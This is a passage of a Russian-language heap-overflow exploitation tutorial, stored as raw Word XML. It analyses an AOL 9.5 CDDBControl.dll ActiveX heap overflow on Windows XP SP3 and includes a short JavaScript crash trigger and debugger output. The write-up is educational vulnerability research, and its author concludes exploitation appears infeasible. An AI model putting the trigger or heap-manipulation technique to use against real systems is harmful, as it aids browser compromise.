        <w:t>ы</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">вать свой код. В качестве подсказки (надеюсь не слишком большой) привожу скриншот, на котором PoC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>исследует</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> структуру кучи:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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6332220" cy="3416300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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6332220" cy="3416300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Разумеется, любая ситуация, в которой вы можете манипулировать структурой кучи, идеальна. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Более лёгкой мишенью для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">манипуляций внутренней структурой кучи являются клентская часть ??? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n easier target for laying out a target processes heap is to use the client side as a reliable way.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>При возможн</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ости</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">и заскриптовать и контролировать </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>её</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, вы без проблемы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">добьётесь </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ситуации, которую можно эксплуатировать переполнени</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ем </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>буфера. В качестве примера можно привести heaplib.js Алекса Соритова</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Alex Soritov</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, которая позволяет аллоцировать и освобождать память и производить множество операций со строками внутри кучи. Если вы используете JavaSctipt или DHTML для аллокации или освобождения чанков в той же куче, что и MSHTML, значит вы можете контролировать менеджер кучи и перенаправлять поток </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>выполнения</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> внутри целевого браузера.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Анализ AOL 9.5 (CDDBControl.dll) Переполнение буфера кучи ActiveX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Я решил рассмотреть эту уязвимость и оценить "эксплуатабельность" это</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>г</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">о бага в Windows XP SP3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Несмотря на то, что [управление] было помечено как небезопасное</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[Despite the control being marked not safe for scripting or initialization,][думаю, тут речь о какой-то управляющей шняге, используемой ActiveX]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, я подумал, что его будет любопытно проанализировать. Я не хотел добавлять эту часть, но sinn3r попросил, и я добавил :). Поскольку всё управляется контроллером ActiveX, один из способов добраться до бага - через IE, используя скриптовый язык. Я решил использовать JavaScript просто потому что он самый гибкий и на нём написана heapLib.js.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Моя среда:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- IE 6/7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- XP SP3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>- heapLib.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Да начнётся веселье! В первую очередь я добился запус</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ка</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> PoC с exploit-db, написанн</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ого</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Hellcode Research. Проанализируем краш:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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332220" cy="1540510"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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6332220" cy="1540510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Мы видим, что в сегменте текущей кучи кончилась свободная память и он не может выделять её в этом сегменте.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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276725" cy="523875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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4276725" cy="523875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Рассмотрим его:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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638165" cy="4279265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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5638165" cy="427926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332220" cy="5622290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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6332220" cy="5622290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Память в сегменте кончилась и у нас нет возможности создать новый сегмент. Что же нам делать? Что ж мы знаем, что придётся разрывать связь в списке чанков. Чтобы это сделать, нужно чтобы менеджер кучи скопировал данные в аллоцирующий буфер(перезаписывая другия чанки), но не вылез за пределы текущего сегмента. Тогда при следующей аллокации или при попытке освободить чанк, произойдёт попытка разорвать связь. Я подправил PoC, чтобы переполнение срабатывало на 2240 байтах вместо 4000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>var x = unescape("%41");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>while (x.length&lt;2240) x += x;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>x = x.substring(0,2240);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>target.BindToFile(x,1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Сейчас, когда мы используем баг, мы на самом деле не крашим браузер. Конечно, чанк переполнен, но пока не произведен второй разрыв, он падать не будет. Однако при закрытии браузера сборщик мусора будет проходить по всем аллокациям и освобождать чанки, тем самым много раз вызывая RtlAllocateHeap(), а значит и сам баг. В этом случае всё становится более реалистичным.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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332220" cy="1044575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6332220" cy="1044575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>First chance exceptions are reported before any exception handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This exception may be expected and handled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eax=41414141 ebx=02270000 ecx=02273f28 edx=02270178 esi=02273f20 edi=41414141</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eip=7c9111de esp=0013e544 ebp=0013e764 iopl=0         nv up ei pl nz na po nc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ntdll!RtlAllocateHeap+0x567:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7c9111de 8b10            mov     edx,dword ptr [eax]  ds:0023:41414141=????????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Отлично! У нас есть потенциально эксплуатируемые условия. В этом случае flink находится в EAX, а blink в EDI. В SP0-1 и ранее можно было просто провести обычное переполнение функций UEF и получить управление. Но у нас есть доступ к скриптовому механизму браузера, что позволит "массажировать" кучу в попытках использовать уязвимость в SP3. При анализе структуры кучи я быстро заметил, что контроллер ActiveX создаёт свою собственную кучу в рантайме. Краш при этом происходит при вставке во freelist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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505450" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5505450" cy="638175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Используя heapLib.js мне удалось манипулировать кучей самого процесса, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> кучей контроллера ActiveX. В этом месте я прихожу к выводу, что в Windows XP SP3 и выше это эксплуатация переполнения буфера кучи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>выглядит</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> невозможной. Конечно, есть шанс серьёзной ошибки в интерпретации </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>результатов</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, но насколько я могу сказать, если нет возможности манипуляции с кучей, нет </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> возможности эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Хуки:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">При отладке приложений, содержащих переполнение кучи, полезно знать количество аллокаций и освобождений памяти, а также их размеры. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">За </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">время жизни процесса/потока их происходит очень много. Очевидно, за ними трудно следить через брекпойнты. В Immunity Debugger вы </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>м</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ожете использовать плагин !hookheap, чтобы повесить хук на RtlAllocateHeap() и RtlFreeHeap(), что позволит вам находит</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ь</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> размер и количество аллокаций/освобождений в определённых операциях.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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3676650" cy="6096000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3676650" cy="6096000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Можно заметить, что одна аллокация особенно выделяется. Выделение большого количества байт указывает на запрос </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>к</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> целевому уязвимому серверу.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Менеджеры кучи очень сложны для понимания, для эксплуатации переполнения кучи требуется много человекочасов, посколько каждая ситуация отличается от других. Понимание те</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
